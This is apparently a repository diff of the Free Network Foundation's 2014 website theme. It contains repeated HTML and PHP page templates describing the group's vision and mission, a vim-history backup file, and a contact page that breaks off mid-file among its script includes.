<h2><a href="http://thefnf.org/volunteer/?page=CiviCRM&q=civicrm/profile/create&reset=1&gid=14">Volunteer time</a></h2>
<h2><a href="https://www.wepay.com/donations/fnf">Donate money</a></h2>
</center>
</div ##end of rightcol>
<div id="footer">
<center>
<img id="license" src="./img/cc_white.png" height=50px width=50px>
</center>
</div ##end of footer>
</div ##end of container>
</body>
</html>

View File

@@ -0,0 +1,66 @@
<!doctype html>
<html>
<head>
<title>Free Network Foundation</title>
<meta charset="utf-8" />
<!--[if IE]>
<script src="http://html5shiv.googlecode.com/svn/trunk/html5.js"></script>
<![endif]-->
<link rel="stylesheet" href="../style.css" type="text/css" />
</head>
<body>
<div id="container" >
<div id="header">
<img class="toplogo" src="img/logo.gif" align="center">
<center>
<a href="./people.html">Who we are</a>
<a href="./contact.html">Contact Us</a>
<a href="http://commons.thefnf.org/index.php/FAQ">FAQ</a>
<a href="http://commons.thefnf.org/index.php/Clippings">Press</a>
<br>
<a href="http://thefnf.org/weblog/">View our Blog</a>
<a href="http://commons.thefnf.org/index.php/Main_Page">Edit our Wiki</a>
<a href="./tools.html">Explore our Tools & Platforms</a>
</center>
</div ## end of header>
<div id="leftcol">
<center>
<h1>Communities</h1>
<img src="./img/world.png">
<h2> Deploy a network </h2>
<h2> Fund a network </h2>
</center>
</div ##end of leftcol>
<div id="centercol">
<center>
<h1>Builders</h1>
<img src="./img/gear.png">
<h2><a href="http://mail.thefnf.org/mailman/listinfo/discuss">Join our general discussion list</a></h2>
<h2><a href="http://mail.thefnf.org/mailman/listinfo/builders">Join our technical discussion list</a></h2>
</center>
</div ##end of centercol>
<div id="rightcol">
<center>
<h1>Supporters</h1>
<img src="./img/arrow.png">
<h2><a href="http://thefnf.org/volunteer/?page=CiviCRM&q=civicrm/profile/create&reset=1&gid=14">Volunteer time</a></h2>
<h2><a href="https://www.wepay.com/donations/fnf">Donate money</a></h2>
</center>
</div ##end of rightcol>
<div id="footer">
<center>
<img id="license" src="./img/cc_white.png" height=50px width=50px>
</center>
</div ##end of footer>
</div ##end of container>
</body>
</html>

View File

@@ -0,0 +1,66 @@
<!doctype html>
<html>
<head>
<title>Free Network Foundation</title>
<meta charset="utf-8" />
<!--[if IE]>
<script src="http://html5shiv.googlecode.com/svn/trunk/html5.js"></script>
<![endif]-->
<link rel="stylesheet" href="../style.css" type="text/css" />
</head>
<body>
<div id="container" >
<div id="header">
<img class="toplogo" src="img/logo.gif" align="center">
<center>
<a href="./people.html">Who we are</a>
<a href="./contact.html">Contact Us</a>
<a href="http://commons.thefnf.org/index.php/FAQ">FAQ</a>
<a href="http://commons.thefnf.org/index.php/Clippings">Press</a>
<br>
<a href="http://thefnf.org/weblog/">View our Blog</a>
<a href="http://commons.thefnf.org/index.php/Main_Page">Edit our Wiki</a>
<a href="./tools.html">Explore our Tools & Platforms</a>
</center>
</div ## end of header>
<div id="leftcol">
<center>
<h1>Communities</h1>
<img src="./img/world.png">
<h2> Deploy a network </h2>
<h2> Fund a network </h2>
</center>
</div ##end of leftcol>
<div id="centercol">
<center>
<h1>Builders</h1>
<img src="./img/gear.png">
<h2><a href="http://mail.thefnf.org/mailman/listinfo/discuss">Join our general discussion list</a></h2>
<h2><a href="http://mail.thefnf.org/mailman/listinfo/builders">Join our technical discussion list</a></h2>
</center>
</div ##end of centercol>
<div id="rightcol">
<center>
<h1>Supporters</h1>
<img src="./img/arrow.png">
<h2><a href="http://thefnf.org/volunteer/?page=CiviCRM&q=civicrm/profile/create&reset=1&gid=14">Volunteer time</a></h2>
<h2><a href="https://www.wepay.com/donations/fnf">Donate money</a></h2>
</center>
</div ##end of rightcol>
<div id="footer">
<center>
<img id="license" src="./img/cc_white.png" height=50px width=50px>
</center>
</div ##end of footer>
</div ##end of container>
</body>
</html>

57
fnf2014/header.php Normal file
View File

@@ -0,0 +1,57 @@
<head>
<title>Free Network Foundation</title>
<meta charset="utf-8" />
<!--[if IE]>
<script src="http://html5shiv.googlecode.com/svn/trunk/html5.js"></script>
<![endif]-->
<link rel="stylesheet" href="https://thefnf.org/js/jsor-jcarousel-7bb2e0a/skins/tango/skin.css"/>
<link rel="stylesheet" href="https://thefnf.org/wp-content/themes/fnf2014/style.css" type="text/css" />
<!-- Piwik -->
<script type="text/javascript">
var _paq = _paq || [];
_paq.push(["trackPageView"]);
_paq.push(["enableLinkTracking"]);
(function() {
var u=(("https:" == document.location.protocol) ? "https" : "http") + "://webstats.thefnf.org/";
_paq.push(["setTrackerUrl", u+"piwik.php"]);
_paq.push(["setSiteId", "1"]);
var d=document, g=d.createElement("script"), s=d.getElementsByTagName("script")[0]; g.type="text/javascript";
g.defer=true; g.async=true; g.src=u+"piwik.js"; s.parentNode.insertBefore(g,s);
})();
</script>
<!-- End Piwik Code -->
<script type"text/javascript" src="https://thefnf.org/js/jsor-jcarousel-7bb2e0a/lib/jquery-1.4.2.min.js"></script>
<script type"text/javascript" src="https://thefnf.org/js/jsor-jcarousel-7bb2e0a/lib/jquery.jcarousel.min.js"></script>
<script type="text/javascript">
jQuery(document).ready(function() {
jQuery('#mycarousel').jcarousel({
scroll: 1
});
});
</script>
<?php wp_head(); ?>
</head>
<body>
<div id="header">
<a href="/"><img class="toplogo" src="https://thefnf.org/img/logo_wordmark_trimmed.png" align="center"></a>
<center>
<ul class="navlist">
<li class="navlist"><a class="navlist" href="https://thefnf.org/about">About</a></li>
<li class="navlist"><a class="navlist" href="https://thefnf.org/contact">Contact</a></li>
<li class="navlist"><a class="navlist" href="https://thefnf.org/category/blog">Weblog</a></li>
<li class="navlist"><a class="navlist" href="https://thefnf.org/faq">faq</a></li>
<li class="navlist"><a class="navlist"
href="https://commons.thefnf.org/">Wiki</a></li>
<li class="navlist"><a class="navlist"
href="https://thefnf.org/donate/?page=CiviCRM&q=civicrm/contribute/transact&reset=1&id=1">Donate</a></li>
</ul>
</center>
</div ## end of header>

68
fnf2014/hombak.php Normal file
View File

@@ -0,0 +1,68 @@
<head>
<title>Free Network Foundation</title>
<meta charset="utf-8" />
<!--[if IE]>
<script src="http://html5shiv.googlecode.com/svn/trunk/html5.js"></script>
<![endif]-->
<link rel="stylesheet" href="style.css" type="text/css" />
</head>
<body>
<div id="header" class="splash">
<a href="index.html"><img class="toplogo"
src="img/logo_wordmark_trimmed.png" align="center"></a>
<center>
<ul class="navlist">
<li class="navlist"><a class="navlist" href="about.html">About</a></li>
<li class="navlist"><a class="here" class="navlist" href="weblog.html">Weblog</a></li>
<li class="navlist"><a class="navlist" href="contact.html">Contact</a></li>
<li class="navlist"><a class="navlist" href="faq.html">faq</a></li>
<li class="navlist"><a class="navlist" href="people.html">People</a></li>
<li class="navlist"><a class="navlist"
href="http://commons.thefnf.org/">Wiki</a></li>
<li class="navlist"><a class="navlist"
href="donate.html">Donate</a></li>
</ul>
</center>
</div ## end of header>
<div id="contentwrapper">
<div id="contentcontainer">
<h2>Weblog</h2>
<div id="sidenav">
<a href="about_weblog.html" class="on">Corporate Weblog</a>
<a href="about_weblogisaac.html">Isaac's Weblog</a>
</div ##end of sidenav>
<div id="col">
<script type="text/javascript"
src="http://output90.rssinclude.com/output?type=js&amp;id=636224&amp;hash=a3d241f405029f2451d26a9c97a68a7a"></script>
</div ##end of col>
</div ## end colcontainer>
</div ## end of colwrapper>
<div id="footer">
<br>
<center>
<img id="license" src="./img/cc_white.png" height=50px width=50px>
<br>
<a href="https://twitter.com/share" class="twitter-share-button" data-count="none">Tweet</a> <script>!function(d,s,id){var js,fjs=d.getElementsByTagName(s)[0];if(!d.getElementById(id)){js=d.createElement(s);js.id=id;js.src="//platform.twitter.com/widgets.js";fjs.parentNode.insertBefore(js,fjs);}}(document,"script","twitter-wjs");
</script>
<script src="//platform.linkedin.com/in.js"
type="text/javascript"></script>
<script type="IN/Share" data-counter="right"></script>
<br>
<a href="http://www.reddit.com/submit" onclick="window.location
= 'http://www.reddit.com/submit?url=' +
encodeURIComponent(window.location); return false"> <img
src="http://www.reddit.com/static/spreddit7.gif" alt="submit
to reddit" border="0" /> </a>
</center>
</div ##end of footer>
</div ##end of wrapper>
</body>
</html>

72
fnf2014/html/about.html Normal file
View File

@@ -0,0 +1,72 @@
<head>
<title>Free Network Foundation</title>
<meta charset="utf-8" />
<!--[if IE]>
<script src="http://html5shiv.googlecode.com/svn/trunk/html5.js"></script>
<![endif]-->
<link rel="stylesheet" href="style.css" type="text/css" />
</head>
<body>
<div id="header" class="splash">
<a href="index.html"><img class="toplogo"
src="img/logo_wordmark_trimmed.png" align="center"></a>
<center>
<ul class="navlist">
<li class="navlist"><a class="here" class="navlist" href="about.html">About</a></li>
<li class="navlist"><a class="navlist" href="weblog.html">Weblog</a></li>
<li class="navlist"><a class="navlist" href="contact.html">Contact</a></li>
<li class="navlist"><a class="navlist" href="faq.html">faq</a></li>
<li class="navlist"><a class="navlist" href="people.html">People</a></li>
<li class="navlist"><a class="navlist"
href="http://commons.thefnf.org/">Wiki</a></li>
<li class="navlist"><a class="navlist"
href="donate.html">Donate</a></li>
</ul>
</center>
</div ## end of header>
<div id="contentwrapper">
<div id="contentcontainer">
<h2>About</h2>
<div id="sidenav">
<a href="about_vision.html" class="on">Vision</a>
<a href="about_mission.html">Mission</a>
<a href="about_whoweare.html">Who We Are</a>
<a href="about_whatwedo.html">What We do</a>
<a href="about_howtohelp.html">How to Help</a>
</div ##end of sidenav>
<div id="col">
<h3> Our Vision</h3>
<p>We envision a world where communities build, maintain, and own their ow
share of the global computer network.</p>
</div ##end of col>
</div ## end colcontainer>
</div ## end of colwrapper>
<div id="footer">
<br>
<center>
<img id="license" src="./img/cc_white.png" height=50px width=50px>
<br>
<a href="https://twitter.com/share" class="twitter-share-button" data-count="none">Tweet</a> <script>!function(d,s,id){var js,fjs=d.getElementsByTagName(s)[0];if(!d.getElementById(id)){js=d.createElement(s);js.id=id;js.src="//platform.twitter.com/widgets.js";fjs.parentNode.insertBefore(js,fjs);}}(document,"script","twitter-wjs");
</script>
<script src="//platform.linkedin.com/in.js"
type="text/javascript"></script>
<script type="IN/Share" data-counter="right"></script>
<br>
<a href="http://www.reddit.com/submit" onclick="window.location
= 'http://www.reddit.com/submit?url=' +
encodeURIComponent(window.location); return false"> <img
src="http://www.reddit.com/static/spreddit7.gif" alt="submit
to reddit" border="0" /> </a>
</center>
</div ##end of footer>
</div ##end of wrapper>
</body>
</html>

View File

@@ -0,0 +1,78 @@
<head>
<title>Free Network Foundation</title>
<meta charset="utf-8" />
<!--[if IE]>
<script src="http://html5shiv.googlecode.com/svn/trunk/html5.js"></script>
<![endif]-->
<link rel="stylesheet" href="style.css" type="text/css" />
</head>
<body>
<div id="header" class="splash">
<a href="index.html"><img class="toplogo"
src="img/logo_wordmark_trimmed.png" align="center"></a>
<center>
<ul class="navlist">
<li class="navlist"><a class="here" class="navlist" href="about.html">About</a></li>
<li class="navlist"><a class="navlist" href="weblog.html">Weblog</a></li>
<li class="navlist"><a class="navlist" href="contact.html">Contact</a></li>
<li class="navlist"><a class="navlist" href="faq.html">faq</a></li>
<li class="navlist"><a class="navlist" href="people.html">People</a></li>
<li class="navlist"><a class="navlist"
href="http://commons.thefnf.org/">Wiki</a></li>
<li class="navlist"><a class="navlist"
href="donate.html">Donate</a></li>
</ul>
</center>
</div ## end of header>
<div id="contentwrapper">
<div id="contentcontainer">
<h2>About</h2>
<div id="sidenav">
<a href="about_vision.html">Vision</a>
<a href="about_mission.html">Mission</a>
<a href="about_whoweare.html">Who We Are</a>
<a href="about_whatwedo.html">What We do</a>
<a href="about_howtohelp.html" class="on">How to Help</a>
</div ##end of sidenav>
<div id="col">
<h3>How To Help</h3>
<p> Tell your friends. There is only one true social network the human one: use
it to spread word of our work. Sign up for our e-mail list. This is our
primary mode of communication, collaboration, and exchange. Come join the
conversation. Contribute. Make a cash donation, by clicking Donate, on the
right side of the page, or contribute your time and expertise. The FNF
operates completely though crowdsourcing and volunteer labor. That means a
lot of small donations from people like you. Money goes to pay for
colocation, bandwidth and development machines.</p>
</div ##end of col>
</div ## end colcontainer>
</div ## end of colwrapper>
<div id="footer">
<br>
<center>
<img id="license" src="./img/cc_white.png" height=50px width=50px>
<br>
<a href="https://twitter.com/share" class="twitter-share-button" data-count="none">Tweet</a> <script>!function(d,s,id){var js,fjs=d.getElementsByTagName(s)[0];if(!d.getElementById(id)){js=d.createElement(s);js.id=id;js.src="//platform.twitter.com/widgets.js";fjs.parentNode.insertBefore(js,fjs);}}(document,"script","twitter-wjs");
</script>
<script src="//platform.linkedin.com/in.js"
type="text/javascript"></script>
<script type="IN/Share" data-counter="right"></script>
<br>
<a href="http://www.reddit.com/submit" onclick="window.location
= 'http://www.reddit.com/submit?url=' +
encodeURIComponent(window.location); return false"> <img
src="http://www.reddit.com/static/spreddit7.gif" alt="submit
to reddit" border="0" /> </a>
</center>
</div ##end of footer>
</div ##end of wrapper>
</body>
</html>

View File

@@ -0,0 +1,76 @@
<head>
<title>Free Network Foundation</title>
<meta charset="utf-8" />
<!--[if IE]>
<script src="http://html5shiv.googlecode.com/svn/trunk/html5.js"></script>
<![endif]-->
<link rel="stylesheet" href="style.css" type="text/css" />
</head>
<body>
<div id="header" class="splash">
<a href="index.html"><img class="toplogo"
src="img/logo_wordmark_trimmed.png" align="center"></a>
<center>
<ul class="navlist">
<li class="navlist"><a class="here" class="navlist" href="about.html">About</a></li>
<li class="navlist"><a class="navlist" href="weblog.html">Weblog</a></li>
<li class="navlist"><a class="navlist" href="contact.html">Contact</a></li>
<li class="navlist"><a class="navlist" href="faq.html">faq</a></li>
<li class="navlist"><a class="navlist" href="people.html">People</a></li>
<li class="navlist"><a class="navlist"
href="http://commons.thefnf.org/">Wiki</a></li>
<li class="navlist"><a class="navlist"
href="donate.html">Donate</a></li>
</ul>
</center>
</div ## end of header>
<div id="contentwrapper">
<div id="contentcontainer">
<h2>About</h2>
<div id="sidenav">
<a href="about_vision.html">Vision</a>
<a href="about_mission.html" class="on">Mission</a>
<a href="about_whoweare.html">Who We Are</a>
<a href="about_whatwedo.html">What We do</a>
<a href="about_howtohelp.html">How to Help</a>
</div ##end of sidenav>
<div id="col">
<h3> Our Mission</h3>
<p>The Free Network Foundation is a nonprofit organization that provides
operators around the world with essential infrastructure for the
realization and support of free networks. We engineer tools and develop
educational resources to facilitate the deployment of resilient,
responsive, and accessible networks.</p>
</div ##end of col>
</div ## end colcontainer>
</div ## end of colwrapper>
<div id="footer">
<br>
<center>
<img id="license" src="./img/cc_white.png" height=50px width=50px>
<br>
<a href="https://twitter.com/share" class="twitter-share-button" data-count="none">Tweet</a> <script>!function(d,s,id){var js,fjs=d.getElementsByTagName(s)[0];if(!d.getElementById(id)){js=d.createElement(s);js.id=id;js.src="//platform.twitter.com/widgets.js";fjs.parentNode.insertBefore(js,fjs);}}(document,"script","twitter-wjs");
</script>
<script src="//platform.linkedin.com/in.js"
type="text/javascript"></script>
<script type="IN/Share" data-counter="right"></script>
<br>
<a href="http://www.reddit.com/submit" onclick="window.location
= 'http://www.reddit.com/submit?url=' +
encodeURIComponent(window.location); return false"> <img
src="http://www.reddit.com/static/spreddit7.gif" alt="submit
to reddit" border="0" /> </a>
</center>
</div ##end of footer>
</div ##end of wrapper>
</body>
</html>

View File

@@ -0,0 +1,72 @@
<head>
<title>Free Network Foundation</title>
<meta charset="utf-8" />
<!--[if IE]>
<script src="http://html5shiv.googlecode.com/svn/trunk/html5.js"></script>
<![endif]-->
<link rel="stylesheet" href="style.css" type="text/css" />
</head>
<body>
<div id="header" class="splash">
<a href="index.html"><img class="toplogo"
src="img/logo_wordmark_trimmed.png" align="center"></a>
<center>
<ul class="navlist">
<li class="navlist"><a class="here" class="navlist" href="about.html">About</a></li>
<li class="navlist"><a class="navlist" href="weblog.html">Weblog</a></li>
<li class="navlist"><a class="navlist" href="contact.html">Contact</a></li>
<li class="navlist"><a class="navlist" href="faq.html">faq</a></li>
<li class="navlist"><a class="navlist" href="people.html">People</a></li>
<li class="navlist"><a class="navlist"
href="http://commons.thefnf.org/">Wiki</a></li>
<li class="navlist"><a class="navlist"
href="donate.html">Donate</a></li>
</ul>
</center>
</div ## end of header>
<div id="contentwrapper">
<div id="contentcontainer">
<h2>About</h2>
<div id="sidenav">
<a href="about_vision.html" class="on">Vision</a>
<a href="about_mission.html">Mission</a>
<a href="about_whoweare.html">Who We Are</a>
<a href="about_whatwedo.html">What We do</a>
<a href="about_howtohelp.html">How to Help</a>
</div ##end of sidenav>
<div id="col">
<h3> Our Vision</h3>
<p>We envision a world where communities build, maintain, and own their ow
share of the global computer network.</p>
</div ##end of col>
</div ## end colcontainer>
</div ## end of colwrapper>
<div id="footer">
<br>
<center>
<img id="license" src="./img/cc_white.png" height=50px width=50px>
<br>
<a href="https://twitter.com/share" class="twitter-share-button" data-count="none">Tweet</a> <script>!function(d,s,id){var js,fjs=d.getElementsByTagName(s)[0];if(!d.getElementById(id)){js=d.createElement(s);js.id=id;js.src="//platform.twitter.com/widgets.js";fjs.parentNode.insertBefore(js,fjs);}}(document,"script","twitter-wjs");
</script>
<script src="//platform.linkedin.com/in.js"
type="text/javascript"></script>
<script type="IN/Share" data-counter="right"></script>
<br>
<a href="http://www.reddit.com/submit" onclick="window.location
= 'http://www.reddit.com/submit?url=' +
encodeURIComponent(window.location); return false"> <img
src="http://www.reddit.com/static/spreddit7.gif" alt="submit
to reddit" border="0" /> </a>
</center>
</div ##end of footer>
</div ##end of wrapper>
</body>
</html>

View File

@@ -0,0 +1,76 @@
<head>
<title>Free Network Foundation</title>
<meta charset="utf-8" />
<!--[if IE]>
<script src="http://html5shiv.googlecode.com/svn/trunk/html5.js"></script>
<![endif]-->
<link rel="stylesheet" href="style.css" type="text/css" />
</head>
<body>
<div id="header" class="splash">
<a href="index.html"><img class="toplogo"
src="img/logo_wordmark_trimmed.png" align="center"></a>
<center>
<ul class="navlist">
<li class="navlist"><a class="here" class="navlist" href="about.html">About</a></li>
<li class="navlist"><a class="navlist" href="weblog.html">Weblog</a></li>
<li class="navlist"><a class="navlist" href="contact.html">Contact</a></li>
<li class="navlist"><a class="navlist" href="faq.html">faq</a></li>
<li class="navlist"><a class="navlist" href="people.html">People</a></li>
<li class="navlist"><a class="navlist"
href="http://commons.thefnf.org/">Wiki</a></li>
<li class="navlist"><a class="navlist"
href="donate.html">Donate</a></li>
</ul>
</center>
</div ## end of header>
<div id="contentwrapper">
<div id="contentcontainer">
<h2>About</h2>
<div id="sidenav">
<a href="about_vision.html">Vision</a>
<a href="about_mission.html">Mission</a>
<a href="about_whoweare.html">Who We Are</a>
<a href="about_whatwedo.html" class="on">What We do</a>
<a href="about_howtohelp.html">How to Help</a>
</div ##end of sidenav>
<div id="col">
<h3>What We Do</h3>
<p>We envision communications infrastructure that is owned and operated
cooperatively, by the whole of humanity, rather than by corporations and
states. We are using the power of peer-to-peer technologies to create a
global network which is resistant to censorship and breakdown. We promote
freedoms, support innovations and advocate technologies that enhance and
enable digital self-determination.</p>
</div ##end of col>
</div ## end colcontainer>
</div ## end of colwrapper>
<div id="footer">
<br>
<center>
<img id="license" src="./img/cc_white.png" height=50px width=50px>
<br>
<a href="https://twitter.com/share" class="twitter-share-button" data-count="none">Tweet</a> <script>!function(d,s,id){var js,fjs=d.getElementsByTagName(s)[0];if(!d.getElementById(id)){js=d.createElement(s);js.id=id;js.src="//platform.twitter.com/widgets.js";fjs.parentNode.insertBefore(js,fjs);}}(document,"script","twitter-wjs");
</script>
<script src="//platform.linkedin.com/in.js"
type="text/javascript"></script>
<script type="IN/Share" data-counter="right"></script>
<br>
<a href="http://www.reddit.com/submit" onclick="window.location
= 'http://www.reddit.com/submit?url=' +
encodeURIComponent(window.location); return false"> <img
src="http://www.reddit.com/static/spreddit7.gif" alt="submit
to reddit" border="0" /> </a>
</center>
</div ##end of footer>
</div ##end of wrapper>
</body>
</html>

View File

@@ -0,0 +1,80 @@
<head>
<title>Free Network Foundation</title>
<meta charset="utf-8" />
<!--[if IE]>
<script src="http://html5shiv.googlecode.com/svn/trunk/html5.js"></script>
<![endif]-->
<link rel="stylesheet" href="style.css" type="text/css" />
</head>
<body>
<div id="header" class="splash">
<a href"index.html"><img class="toplogo"
src="img/logo_wordmark_trimmed.png" align="center"></a>
<center>
<ul class="navlist">
<li class="navlist"><a class="here" class="navlist" href="about.html">About</a></li>
<li class="navlist"><a class="navlist" href="weblog.html">Weblog</a></li>
<li class="navlist"><a class="navlist" href="contact.html">Contact</a></li>
<li class="navlist"><a class="navlist" href="faq.html">faq</a></li>
<li class="navlist"><a class="navlist" href="people.html">People</a></li>
<li class="navlist"><a class="navlist"
href="http://commons.thefnf.org/">Wiki</a></li>
<li class="navlist"><a class="navlist"
href="donate.html">Donate</a></li>
</ul>
</center>
</div ## end of header>
<div id="contentwrapper">
<div id="contentcontainer">
<h2>About</h2>
<div id="sidenav">
<a href="about_vision.html">Vision</a>
<a href="about_mission.html">Mission</a>
<a href="about_whoweare.html" class="on">Who We Are</a>
<a href="about_whatwedo.html">What We do</a>
<a href="about_howtohelp.html">How to Help</a>
</div ##end of sidenav>
<div id="col">
<h3>Who We Are</h3>
<p>We are an organization committed to the tenets of free information, free
culture, and free society. We hold that advances in information technology
provide humanity with the ability to effectively face global challenges. We
contend that our very ability to mobilize, organize, and bring about change
depends on our ability to communicate. We see that our ability to
communicate is purchased from a handful of powerful entities. We know that
we cannot depend on these entities to support movement away from a status
quo from which they are the beneficiaries. We believe that access to a free
network is a human right, and a necessary tool for environmental and social
justice.</p>
</div ##end of col>
</div ## end colcontainer>
</div ## end of colwrapper>
<div id="footer">
<br>
<center>
<img id="license" src="./img/cc_white.png" height=50px width=50px>
<br>
<a href="https://twitter.com/share" class="twitter-share-button" data-count="none">Tweet</a> <script>!function(d,s,id){var js,fjs=d.getElementsByTagName(s)[0];if(!d.getElementById(id)){js=d.createElement(s);js.id=id;js.src="//platform.twitter.com/widgets.js";fjs.parentNode.insertBefore(js,fjs);}}(document,"script","twitter-wjs");
</script>
<script src="//platform.linkedin.com/in.js"
type="text/javascript"></script>
<script type="IN/Share" data-counter="right"></script>
<br>
<a href="http://www.reddit.com/submit" onclick="window.location
= 'http://www.reddit.com/submit?url=' +
encodeURIComponent(window.location); return false"> <img
src="http://www.reddit.com/static/spreddit7.gif" alt="submit
to reddit" border="0" /> </a>
</center>
</div ##end of footer>
</div ##end of wrapper>
</body>
</html>

73
fnf2014/html/contact.bak Normal file
View File

@@ -0,0 +1,73 @@
%s/
//g
wa
%s/forum/owa/g
632
set number
631
%s/zabbix/freeswitch/g
w!
%s/default/incbits/g
:w
%s/default/kb
%s/default/legwatch/g
%s/default/mblog/g
%s/default/
%s/mblog/meetings/g
%s/default/meetings/g
%s/default/photos
%s/default/photos/g
%s/default/phplist/g
%s/default/racktable/g
%s/default/snetinsight/g
%s/default/social/g
%s/default/staticbits/g
%s/default/support/g
%s/default/ushadi
%s/default/video/g
%s/default/xibo/g
w xxx
%s/default/chili/g
%s/default/forum/g
%s/default/webstats/g
//sourceforge.net/projects/lame/files/lame/3.99/lame-3.99.5.tar.gz
//downloads.xiph.org/releases/ogg/libogg-1.3.0.tar.gz
//downloads.xiph.org/releases/vorbis/libvorbis-1.3.3.tar.gz
//ftp.penguin.cz/pub/users/utx/amr/amrnb-10.0.0.0.tar.bz2
//ftp.penguin.cz/pub/users/utx/amr/amrwb-10.0.0.0.tar.bz2
//downloads.xiph.org/releases/theora/libtheora-1.1beta3.tar.gz
//www8.mplayerhq.hu/MPlayer/releases/codecs/essential-amd64-20071007.tar.bz2
//rubyforge.org/frs/download.php/17497/flvtool2-1.0.6.tgz
prev
N
%s/default/pastebin/g
312
220
.,.+8q
sp forum
602
%s/photos/prodmanuals
%s/photos/sharing
%s/photos/kb/g
%s/www/devfro
%s/devfro/devfront
%s/known
qw
mouse=r
w:w
set mouse=r
set ai
set ts=4
%s/h2/h3/g
set paste
rew
n
WQ
W
wq!
966
1
q
w
q!
wq

235
fnf2014/html/contact.html Normal file
View File

@@ -0,0 +1,235 @@
<head>
<title>Free Network Foundation</title>
<meta charset="utf-8" />
<!--[if IE]>
<script src="http://html5shiv.googlecode.com/svn/trunk/html5.js"></script>
<![endif]-->
<link rel="stylesheet" href="style.css" type="text/css" />
</head>
<body>
<div id="header" class="splash">
<a href="index.html"><img class="toplogo"
src="img/logo_wordmark_trimmed.png" align="center"></a>
<center>
<ul class="navlist">
<li class="navlist"><a class="navlist" href="about.html">About</a></li>
<li class="navlist"><a class="navlist" href="weblog.html">Weblog</a></li>
<li class="navlist"><a class="here" class="navlist" href="contact.html">Contact</a></li>
<li class="navlist"><a class="navlist" href="faq.html">faq</a></li>
<li class="navlist"><a class="navlist" href="people.html">People</a></li>
<li class="navlist"><a class="navlist"
href="http://commons.thefnf.org/">Wiki</a></li>
<li class="navlist"><a class="navlist"
href="donate.html">Donate</a></li>
</ul>
</center>
</div ## end of header>
<div id="contentwrapper">
<div id="contentcontainer">
<h2>Contact</h2>
<div id="sidenav">
<a href="contact.html" class="on">Web Form</a>
<a href="contact_email.html">E-mail</a>
<a href="contact_irc.html">IRC</a>
</div ##end of sidenav>
<div id="col">
<script type="text/javascript"
src="http://thefnf.org/wp-content/plugins/civicrm/civicrm/packages/jquery/jquery.min.js"></script>
<script type="text/javascript"
src="http://thefnf.org/wp-content/plugins/civicrm/civicrm/packages/jquery/jquery-ui-1.8.16/js/jquery-ui-1.8.16.custom.min.js"></script>
<style type="text/css">@import
url("http://thefnf.org/wp-content/plugins/civicrm/civicrm/packages/jquery/jquery-ui-1.8.16/css/smoothness/jquery-ui-1.8.16.custom.css");</style>
<script type="text/javascript"
src="http://thefnf.org/wp-content/plugins/civicrm/civicrm/packages/jquery/plugins/jquery.autocomplete.js"></script>
<style type="text/css">@import
url("http://thefnf.org/wp-content/plugins/civicrm/civicrm/packages/jquery/css/jquery.autocomplete.css");</style>
<script type="text/javascript"
src="http://thefnf.org/wp-content/plugins/civicrm/civicrm/packages/jquery/plugins/jstree/jquery.jstree.js"></script>
<style type="text/css">@import
url("http://thefnf.org/wp-content/plugins/civicrm/civicrm/packages/jquery/plugins/jstree/themes/default/style.css");</style>
<script type="text/javascript"
src="http://thefnf.org/wp-content/plugins/civicrm/civicrm/packages/jquery/plugins/jquery.menu.pack.js"></script>
<style type="text/css">@import
url("http://thefnf.org/wp-content/plugins/civicrm/civicrm/packages/jquery/css/menu.css");</style>
<script type="text/javascript"
src="http://thefnf.org/wp-content/plugins/civicrm/civicrm/packages/jquery/plugins/jquery.chainedSelects.js"></script>
<script type="text/javascript"
src="http://thefnf.org/wp-content/plugins/civicrm/civicrm/packages/jquery/plugins/jquery.contextMenu.js"></script>
<script type="text/javascript"
src="http://thefnf.org/wp-content/plugins/civicrm/civicrm/packages/jquery/plugins/jquery.tableHeader.js"></script>
<script type="text/javascript"
src="http://thefnf.org/wp-content/plugins/civicrm/civicrm/packages/jquery/plugins/jquery.textarearesizer.js"></script>
<script type="text/javascript"
src="http://thefnf.org/wp-content/plugins/civicrm/civicrm/packages/jquery/plugins/jquery.form.js"></script>
<script type="text/javascript"
src="http://thefnf.org/wp-content/plugins/civicrm/civicrm/packages/jquery/plugins/jquery.tokeninput.js"></script>
<style type="text/css">@import
url("http://thefnf.org/wp-content/plugins/civicrm/civicrm/packages/jquery/css/token-input-facebook.css");</style>
<script type="text/javascript"
src="http://thefnf.org/wp-content/plugins/civicrm/civicrm/packages/jquery/plugins/jquery.timeentry.pack.js"></script>
<script type="text/javascript"
src="http://thefnf.org/wp-content/plugins/civicrm/civicrm/packages/jquery/plugins/jquery.mousewheel.pack.js"></script>
<script type="text/javascript"
src="http://thefnf.org/wp-content/plugins/civicrm/civicrm/packages/jquery/plugins/jquery.toolTip.js"></script>
<script type="text/javascript"
src="http://thefnf.org/wp-content/plugins/civicrm/civicrm/packages/jquery/plugins/DataTables/media/js/jquery.dataTables.min.js"></script>
<style type="text/css">@import
url("http://thefnf.org/wp-content/plugins/civicrm/civicrm/packages/jquery/plugins/DataTables/media/css/demo_table_jui.css");</style>
<script type="text/javascript"
src="http://thefnf.org/wp-content/plugins/civicrm/civicrm/packages/jquery/plugins/jquery.dashboard.js"></script>
<style type="text/css">@import
url("http://thefnf.org/wp-content/plugins/civicrm/civicrm/packages/jquery/css/dashboard.css");</style>
<script type="text/javascript"
src="http://thefnf.org/wp-content/plugins/civicrm/civicrm/packages/jquery/plugins/jquery.FormNavigate.js"></script>
<script type="text/javascript"
src="http://thefnf.org/wp-content/plugins/civicrm/civicrm/packages/jquery/plugins/jquery.validate.js"></script>
<script type="text/javascript"
src="http://thefnf.org/wp-content/plugins/civicrm/civicrm/packages/jquery/plugins/jquery.civicrm-validate.js"></script>
<script type="text/javascript"
src="http://thefnf.org/wp-content/plugins/civicrm/civicrm/packages/jquery/plugins/jquery.ui.datepicker.validation.pack.js"></script>
<script type="text/javascript"
src="http://thefnf.org/wp-content/plugins/civicrm/civicrm/packages/jquery/plugins/jquery-fieldselection.js"></script>
<script type="text/javascript"
src="http://thefnf.org/wp-content/plugins/civicrm/civicrm/packages/jquery/plugins/jquery.jeditable.mini.js"></script>
<script type="text/javascript"
src="http://thefnf.org/wp-content/plugins/civicrm/civicrm/packages/jquery/plugins/jquery.mustache.js"></script>
<script type="text/javascript"
src="http://thefnf.org/wp-content/plugins/civicrm/civicrm/packages/jquery/plugins/jquery.blockUI.js"></script>
<script type="text/javascript"
src="http://thefnf.org/wp-content/plugins/civicrm/civicrm/js/rest.js"></script>
<script type="text/javascript"
src="http://thefnf.org/wp-content/plugins/civicrm/civicrm/js/Common.js"></script>
<script type="text/javascript"
